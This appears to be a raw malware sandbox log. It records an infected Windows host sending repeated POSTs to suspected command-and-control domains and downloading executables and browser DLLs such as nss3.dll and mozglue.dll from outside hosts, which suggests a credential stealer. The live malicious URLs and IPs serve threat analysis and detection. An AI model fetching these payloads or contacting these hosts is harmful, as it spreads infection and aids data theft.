                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhxpljskoo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qseyddwdi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugynawfq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqaspb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkqvrbje.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tceeer.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvjlsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxaefwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igvekrqlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chuxidlayb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vgrvqyptj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbqys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtjppnbp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkuthbgxw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upcunwrd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gaspj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwxnrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwxef.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sygdrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npsrffrpxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqqeihdtfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://holwhrfuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnaye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nycnks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpole.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfxeicq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wsnlxaykp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwhbdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifihkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtvebqyko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvqho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmhfhgftt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iilwqqrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: amogohuigotuli.at
Source: global traffic | HTTP traffic detected: GET /install1.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bjhri.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wanghml.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 288 | Host: amogohuigotuli.at
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nebtobstfs.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 184 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ivgwjg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 329 | Host: amogohuigotuli.at
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://enxrrgsqu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 327 | Host: amogohuigotuli.at
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ofxlqqbqej.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 190 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ytdefkxsg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vnrbprjedc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 325 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /6.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0620531.xsph.ru
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gjxtjba.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 325 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://garlvmrpv.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 233 | Host: amogohuigotuli.at
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pagwfnjr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 252 | Host: host-data-coin-11.com
Source: C:\Windows\explorer.exe | DNS query: name: bit.ly
Source: global traffic | TCP traffic: 192.168.2.4:49815 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.4:49871 -> 86.107.197.138:38133
Source: unknown | Network traffic detected: IP country count 12
Source: global traffic | TCP traffic: 192.168.2.4:49827 -> 104.47.54.36:25
Source: 768F.exe, 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, 768F.exe, 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /install1.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unic11m.top
Source: global traffic | HTTP traffic detected: GET /install1.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 78.46.160.87 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 78.46.160.87 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 78.46.160.87 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0620531.xsph.ru
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 78.46.160.87 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /htrrfwedsqw.exe HTTP/1.1 | Host: a0620531.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /c_setup.exe HTTP/1.1 | Host: a0620531.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /RMR.exe HTTP/1.1 | Host: a0620531.xsph.ru | Accept: */*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
